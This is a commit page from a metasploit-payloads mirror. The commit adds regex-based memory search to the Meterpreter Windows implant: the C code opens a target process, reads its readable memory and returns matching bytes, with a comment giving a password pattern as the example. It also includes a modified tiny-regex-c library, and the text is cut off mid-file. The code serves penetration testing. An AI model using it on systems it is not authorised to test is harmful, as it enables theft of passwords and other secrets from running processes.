github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Add Windows Memory Search support using regex

Browse Source
This commit is contained in:
sjanusz-r7 2023-11-28 18:35:43 +00:00
parent 6858efcdb8
commit 6e2889d64c
10 changed files with 946 additions and 0 deletions
c/meterpreter
source
common
common_command_ids.h
extensions/stdapi
server
stdapi.c
sys/process
memory.cprocess.h
stdapi.h
tiny-regex-c
README.mdre.cre.h
workspace/ext_server_stdapi
CMakeLists.txtext_server_stdapi.vcxproj

1
c/meterpreter/source/common/common_command_ids.h

@ -174,6 +174,7 @@
#define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115
#define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116
#define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117
#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119
#define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
#define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
#define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003

1
c/meterpreter/source/extensions/stdapi/server/stdapi.c

@ -69,6 +69,7 @@ Command customCommands[] =
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search),
// Thread
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open),

341
c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c

@ -1,5 +1,6 @@
#include "precomp.h"
#include "common_metapi.h"
#include "../tiny-regex-c/re.h"
/*!
* @brief Allocates memory in the context of the supplied process.
@ -339,3 +340,343 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
typedef NTSTATUS* PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#ifndef __kernel_entry
#define __kernel_entry
#endif
typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead);
typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject);
typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName);
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html
// https://ntdoc.m417z.com/ntreadvirtualmemory
typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation
} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html
typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, PSIZE_T ResultLength);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html
// https://ntdoc.m417z.com/ntopenprocess
typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
//{
// DWORD dwLength;
// DWORD dwInitialized;
// LPVOID lpSsHandle;
// LIST_ENTRY InLoadOrderModuleList;
// LIST_ENTRY InMemoryOrderModuleList;
// LIST_ENTRY InInitializationOrderModuleList;
// LPVOID lpEntryInProgress;
//} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
BYTE Reserved1[16];
PVOID Reserved2[10];
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef
VOID
(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) (
VOID
);
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
BYTE Reserved4[104];
PVOID Reserved5[52];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved6[128];
PVOID Reserved7[1];
ULONG SessionId;
} PEB, * PPEB;
typedef struct _PROCESS_BASIC_INFORMATION {
PVOID Reserved1;
PPEB PebBaseAddress;
PVOID Reserved2[2];
ULONG_PTR UniqueProcessId;
PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION;
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessWow64Information = 26
} PROCESSINFOCLASS;
BOOL can_read_memory(DWORD memory_protect)
{
const int page_execute_read = 0x20;
const int page_execute_readwrite = 0x40;
const int page_readonly = 0x02;
const int page_readwrite = 0x04;
return memory_protect == page_execute_read ||
memory_protect == page_execute_readwrite ||
memory_protect == page_readonly ||
memory_protect == page_readwrite;
}
// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string.
struct regex_needle
{
char* raw_needle_buffer;
size_t length;
regex_t* compiled_needle;
};
#define NEEDLES_MAX (size_t)5
DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
{
Packet* response = met_api->packet.create_response(packet);
DWORD result = ERROR_SUCCESS;
char* buffer = NULL;
size_t needle_enum_index = 0;
HANDLE process_handle = NULL;
dprintf("[MEM SEARCH] Getting PID...");
const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID);
if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; }
dprintf("[MEM SEARCH] Searching PID: %lu", pid);
// Iterate over all the needles in the packet.
Tlv needle_buffer_tlv = { 0 };
struct regex_needle* regex_needles[NEEDLES_MAX];
while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS)
{
// The header contains a null-terminator which we do not need.
const size_t needle_length = needle_buffer_tlv.header.length - 1;
dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle));
regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle));
if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; }
regex_needles[needle_enum_index]->length = needle_length;
regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char));
if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; }
memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length);
dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length);
dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer);
regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length);
if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; }
needle_enum_index++;
}
dprintf("[MEM SEARCH] Getting Match Lengths");
const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT);
const size_t max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN);
if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; }
const size_t current_max_match_length = max_match_length;
dprintf("[MEM SEARCH] Getting handles & proc addresses");
const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll");
if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; }
const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll");
if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; }
const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress");
if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address;
const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx");
if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess");
if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle");
if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory");
if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const OPENPROCESS OpenProcess = (OPENPROCESS)open_process;
const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle;
const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex;
const NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory;
const DWORD process_vm_read = 0x0010;
const DWORD process_query_information = 0x0400;
const DWORD wanted_process_perms = process_vm_read | process_query_information;
dprintf("[MEM SEARCH] Opening process");
process_handle = OpenProcess(wanted_process_perms, FALSE, pid);
if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; }
MEMORY_BASIC_INFORMATION mem = { 0 };
const size_t megabytes_64 = 64 * 1024 * 1024;
dprintf("[MEM SEARCH] Allocating buffer for storing process memory");
buffer = (char*)malloc(megabytes_64);
if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; }
// The maximum length of data that we can read into a buffer at a time from a memory region.
const size_t current_max_size = megabytes_64;
for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize)
{
if (!can_read_memory(mem.Protect)) { continue; }
size_t memory_region_offset = 0;
// Note: This currently does not support regex'ing over multiple memory regions.
// e.g.
// regex = "my_password.*";
// | ....my_pas | sword.... |
while (mem.RegionSize > memory_region_offset)
{
const size_t leftover_bytes = mem.RegionSize - memory_region_offset;
const size_t bytes_to_read = min(leftover_bytes, current_max_size);
dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes);
dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read);
size_t bytes_read = 0;
const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset;
// Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached.
const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read);
if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; }
dprintf("[MEM SEARCH] Read %llu bytes", bytes_read);
// Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer.
if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; }
for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++)
{
// This is the buffer offset for this needle only.
size_t current_buffer_offset = 0;
size_t match_length = 0;
int result = -1;
do
{
const char* current_buffer_ptr = buffer + current_buffer_offset;
const size_t bytes_to_regex = bytes_read - current_buffer_offset;
result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length);
if (result != -1)
{
const size_t match_address = read_address + result;
dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --");
dprintf("[MEM SEARCH] Address: %p", match_address);
dprintf("[MEM SEARCH] Creating results group");
Packet* search_results = met_api->packet.create_group();
if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; }
dprintf("[MEM SEARCH] Adding results to packet group");
dprintf("[MEM SEARCH] Adding Match bytes");
// TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached.
const size_t current_match_length = min(max_match_length, match_length);
// Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash.
met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length);
dprintf("[MEM SEARCH] Adding Match address");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address);
dprintf("[MEM SEARCH] Adding Region base address");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress);
dprintf("[MEM SEARCH] Adding Region size");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize);
dprintf("[MEM SEARCH] Adding Match Length");
met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length);
dprintf("[MEM SEARCH] Adding Group");
met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results);
current_buffer_offset += (result + current_match_length);
}
} while (result != -1);
}
memory_region_offset += bytes_to_read;
}
}
result = ERROR_SUCCESS;
done:
dprintf("[MEM SEARCH] Memory Search complete.");
if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); }
if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); }
dprintf("[MEM SEARCH] Cleaning up needles");
for (size_t i = 0; i < needle_enum_index; i++)
{
if (regex_needles[i] != NULL)
{
if (regex_needles[i]->raw_needle_buffer != NULL)
{
dprintf("[MEM SEARCH] Freeing needle buffer");
free(regex_needles[i]->raw_needle_buffer);
}
dprintf("[MEM SEARCH] Freeing regex needle.");
free(regex_needles[i]);
}
}
dprintf("[MEM SEARCH] Transmitting response");
met_api->packet.transmit_response(result, remote, response);
return ERROR_SUCCESS;
}

1
c/meterpreter/source/extensions/stdapi/server/sys/process/process.h

@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_search(Remote *remote, Packet *packet);
// Thread
DWORD request_sys_process_thread_open(Remote *remote, Packet *packet);

9
c/meterpreter/source/extensions/stdapi/stdapi.h

@ -98,6 +98,15 @@
#define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 )
#define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 )
// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262
#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 )
#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 )
#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 )
#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 )
// Registry
#define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 )
#define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY

3
c/meterpreter/source/tiny-regex-c/README.md Normal file

@ -0,0 +1,3 @@
# tiny-regex-c
This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes.

511
c/meterpreter/source/tiny-regex-c/re.c Normal file

@ -0,0 +1,511 @@
/*
*
* Mini regex-module inspired by Rob Pike's regex code described in:
*
* http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html
*
*
*
* Supports:
* ---------
* '.' Dot, matches any character
* '^' Start anchor, matches beginning of string
* '$' End anchor, matches end of string
* '*' Asterisk, match zero or more (greedy)
* '+' Plus, match one or more (greedy)
* '?' Question, match zero or one (non-greedy)
* '[abc]' Character class, match if one of {'a', 'b', 'c'}
* '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken!
* '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z }
* '\s' Whitespace, \t \f \r \n \v and spaces
* '\S' Non-whitespace
* '\w' Alphanumeric, [a-zA-Z0-9_]
* '\W' Non-alphanumeric
* '\d' Digits, [0-9]
* '\D' Non-digits
*
*
*/
#include "re.h"
#include <stdio.h>
#include <ctype.h>
/* Definitions: */
#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */
#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. */
enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ };
/* Private function declarations: */
static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchcharclass(char c, const char* str);
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchone(regex_t p, char c);
static int matchdigit(char c);
static int matchalpha(char c);
static int matchwhitespace(char c);
static int matchmetachar(char c, const char* str);
static int matchrange(char c, const char* str);
static int matchdot(char c);
static int ismetachar(char c);
/* Public functions: */
int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength)
{
return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength);
}
int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength)
{
*matchlength = 0;
if (pattern == 0 || text_length == 0) { return -1; }
if (pattern[0].type == BEGIN)
{
return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1);
}
size_t idx = -1;
do
{
idx += 1;
if (matchpattern(pattern, text, text_length, idx, matchlength))
{
return (int)idx;
}
}
while (idx < text_length);
return -1;
}
re_t re_compile(const char* pattern, size_t pattern_length)
{
/* The sizes of the two static arrays below substantiates the static RAM usage of this module.
MAX_REGEXP_OBJECTS is the max number of symbols in the expression.
MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */
static regex_t re_compiled[MAX_REGEXP_OBJECTS];
static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN];
int ccl_bufidx = 1;
char c; /* current char in pattern */
int i = 0; /* index into pattern */
int j = 0; /* index into re_compiled */
while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS))
{
c = pattern[i];
switch (c)
{
/* Meta-characters: */
case '^': { re_compiled[j].type = BEGIN; } break;
case '$': { re_compiled[j].type = END; } break;
case '.': { re_compiled[j].type = DOT; } break;
case '*': { re_compiled[j].type = STAR; } break;
case '+': { re_compiled[j].type = PLUS; } break;
case '?': { re_compiled[j].type = QUESTIONMARK; } break;
/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */
/* Escaped character-classes (\s \w ...): */
case '\\':
{
if (i + 1 < (int)pattern_length)
{
/* Skip the escape-char '\\' */
i += 1;
/* ... and check the next */
switch (pattern[i])
{
/* Meta-character: */
case 'd': { re_compiled[j].type = DIGIT; } break;
case 'D': { re_compiled[j].type = NOT_DIGIT; } break;
case 'w': { re_compiled[j].type = ALPHA; } break;
case 'W': { re_compiled[j].type = NOT_ALPHA; } break;
case 's': { re_compiled[j].type = WHITESPACE; } break;
case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break;
/* Escaped character, e.g. '.' or '$' */
default:
{
re_compiled[j].type = CHAR;
re_compiled[j].u.ch = pattern[i];
} break;
}
}
/* '\\' as last char in pattern -> invalid regular expression. */
/*
else
{
re_compiled[j].type = CHAR;
re_compiled[j].ch = pattern[i];
}
*/
} break;
/* Character class: */
case '[':
{
/* Remember where the char-buffer starts. */
int buf_begin = ccl_bufidx;
/* Look-ahead to determine if negated */
if (pattern[i+1] == '^')
{
re_compiled[j].type = INV_CHAR_CLASS;
i += 1; /* Increment i to avoid including '^' in the char-buffer */
if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */
{
return 0;
}
}
else
{
re_compiled[j].type = CHAR_CLASS;
}
/* Copy characters inside [..] to buffer */
while ( (pattern[++i] != ']')
&& (pattern[i] != '\0')) /* Missing ] */
{
if (pattern[i] == '\\')
{
if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1)
{
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */
{
return 0;
}
ccl_buf[ccl_bufidx++] = pattern[i++];
}
else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN)
{
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
ccl_buf[ccl_bufidx++] = pattern[i];
}
if (ccl_bufidx >= MAX_CHAR_CLASS_LEN)
{
/* Catches cases such as [00000000000000000000000000000000000000][ */
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
/* Null-terminate string end */
ccl_buf[ccl_bufidx++] = 0;
re_compiled[j].u.ccl = &ccl_buf[buf_begin];
} break;
/* Other characters: */
default:
{
re_compiled[j].type = CHAR;
re_compiled[j].u.ch = c;
} break;
}
/* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */
if (pattern[i] == 0)
{
return 0;
}
i += 1;
j += 1;
}
/* 'UNUSED' is a sentinel used to indicate end-of-pattern */
re_compiled[j].type = UNUSED;
return (re_t) re_compiled;
}
void re_print(regex_t* pattern)
{
const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" };
int i;
int j;
char c;
for (i = 0; i < MAX_REGEXP_OBJECTS; ++i)
{
if (pattern[i].type == UNUSED)
{
break;
}
printf("type: %s", types[pattern[i].type]);
if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS)
{
printf(" [");
for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j)
{
c = pattern[i].u.ccl[j];
if ((c == '\0') || (c == ']'))
{
break;
}
printf("%c", c);
}
printf("]");
}
else if (pattern[i].type == CHAR)
{
printf(" '%c'", pattern[i].u.ch);
}
printf("\n");
}
}
/* Private functions: */
static int matchdigit(char c)
{
return isdigit(c);
}
static int matchalpha(char c)
{
return isalpha(c);
}
static int matchwhitespace(char c)
{
return isspace(c);
}
static int matchalphanum(char c)
{
return ((c == '_') || matchalpha(c) || matchdigit(c));
}
static int matchrange(char c, const char* str)
{
return ( (c != '-')
&& (str[0] != '\0')
&& (str[0] != '-')
&& (str[1] == '-')
&& (str[2] != '\0')
&& ( (c >= str[0])
&& (c <= str[2])));
}
static int matchdot(char c)
{
#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1)
(void)c;
return 1;
#else
return c != '\n' && c != '\r';
#endif
}
static int ismetachar(char c)
{
return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D'));
}
static int matchmetachar(char c, const char* str)
{
switch (str[0])
{
case 'd': return matchdigit(c);
case 'D': return !matchdigit(c);
case 'w': return matchalphanum(c);
case 'W': return !matchalphanum(c);
case 's': return matchwhitespace(c);
case 'S': return !matchwhitespace(c);
default: return (c == str[0]);
}
}
static int matchcharclass(char c, const char* str)
{
do
{
if (matchrange(c, str))
{
return 1;
}
else if (str[0] == '\\')
{
/* Escape-char: increment str-ptr and match on next char */
str += 1;
if (matchmetachar(c, str))
{
return 1;
}
else if ((c == str[0]) && !ismetachar(c))
{
return 1;
}
}
else if (c == str[0])
{
if (c == '-')
{
return ((str[-1] == '\0') || (str[1] == '\0'));
}
else
{
return 1;
}
}
}
while (*str++ != '\0');
return 0;
}
static int matchone(regex_t p, char c)
{
switch (p.type)
{
case DOT: return matchdot(c);
case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl);
case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl);
case DIGIT: return matchdigit(c);
case NOT_DIGIT: return !matchdigit(c);
case ALPHA: return matchalphanum(c);
case NOT_ALPHA: return !matchalphanum(c);
case WHITESPACE: return matchwhitespace(c);
case NOT_WHITESPACE: return !matchwhitespace(c);
default: return (p.u.ch == c);
}
}
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
size_t prelen = *matchlength;
const char* prepoint = text;
while ((text_offset < text_length) && matchone(p, text[text_offset]))
{
text_offset++;
(*matchlength)++;
}
while (&text[text_offset] >= prepoint)
{
if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
return 1;
(*matchlength)--;
}
